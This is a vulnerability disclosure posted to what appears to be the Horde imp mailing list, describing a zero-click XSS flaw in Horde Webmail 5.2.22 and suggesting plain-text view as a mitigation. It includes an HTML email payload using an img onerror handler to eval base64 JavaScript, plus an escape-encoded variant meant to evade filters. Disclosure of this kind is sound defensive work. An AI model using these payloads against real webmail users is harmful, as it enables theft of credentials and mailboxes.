[imp] Horde v 5.2.22 vulnerability – obfuscation via HTML encoding – XSS payload

Nataša K. Arh natasa.jakec at gmail.com
Fri Mar 21 09:04:40 UTC 2025 

Hi.

I forgot to mention that currently the fastest way to mitigate the
vulnerability is to disable HTML email view and enable only text/plain view
of the email content.


Regards, Tasha & Vito

On Fri, Mar 21, 2025 at 9:18 AM Nataša K. Arh <natasa.jakec at gmail.com>
wrote:

> Hi.
>
> A vulnerability within Horde Web Client was discovered during our
> investigation. We have already seen this vulnerability being exploited in
> the wild.
>
> If an attacker crafts a specially prepared email, he/she can abuse this
> vulnerability to retrieve username, password and complete email database
> of a user mailbox.
>
>
> *Details*
>
> The content inside email header base64 encoded text/html boundary contains
> a specially crafted HTML.
>
>
> --===============boundary==
>
> Content-Type: text/html; charset="utf-8"
>
> Content-Transfer-Encoding: base64
>
> MIME-Version: 1.0
>
>
> Injecting a XSS payload inside an HTML attribute, namely the “onerror”
> event handler, the server-side checks does not sanitize the payload and
> does not detect HTML encoded characters.
>
> When the browser renders the page, it will decode and execute the injected
> payload.
>
> This is injected at the end of the legit HTML content.
>
>
> Example:
>
> <html>
>
> <body>
>
> <p>Hi...</p>
>
> Regards<br>
>
> *<math><style>*
>
> *<img style=display:none src=nonexsisting.png
> onerror="window.parent.eval(window.parent.atob('base64 encoded
> JavaScript'));">*
>
> *</style></math>*
>
> </body></html>
>
>
> To evade detection Unicode characters can be used:
> For eval:
> - \u{065} represents the Unicode character for the letter "e."
> - \u{076} represents the Unicode character for the letter "v."
> - \141 (octal) or \x6C (hexadecimal) represents the letter "a."
> - \x6C represents the hexadecimal for the letter "l."
>
> For atob:
> - \u{61} represents the Unicode character for the letter "a."
> - \u{74} represents the Unicode character for the letter "t."
> - o is a regular character.
> - \142 (octal) represents the letter "b."
>
> Example:
>
> <html>
> <body>
> <p>Hi...</p>
> Regards<br>
> *<math><style><img style=display:none **src=nonexsisting.png*
> * onerror="window.parent['\u{065}\u{076}\141\x6C'](window.parent['\u{61}\u{74}o\142']('base64
> encoded JavaScript'))"></style></math>*
> </body></html>
>
> The “nonexsisting.png” image is searched inside /imp, since it does not
> exist the “onerror” content is executed.
>
> A specially crafted JavaScript code inside the *'base64 encoded
> JavaScript'* is executed.
>
> This kind of crafted email is a zero-click attack, where no click is
> needed from a user side other then looking this email in the Horde web
> client.
>
> Since there are still Horde web clients used, it would be nice to fix this
> vulnerability.
>
>
>
> --
> Regards.
>

More information about the imp mailing list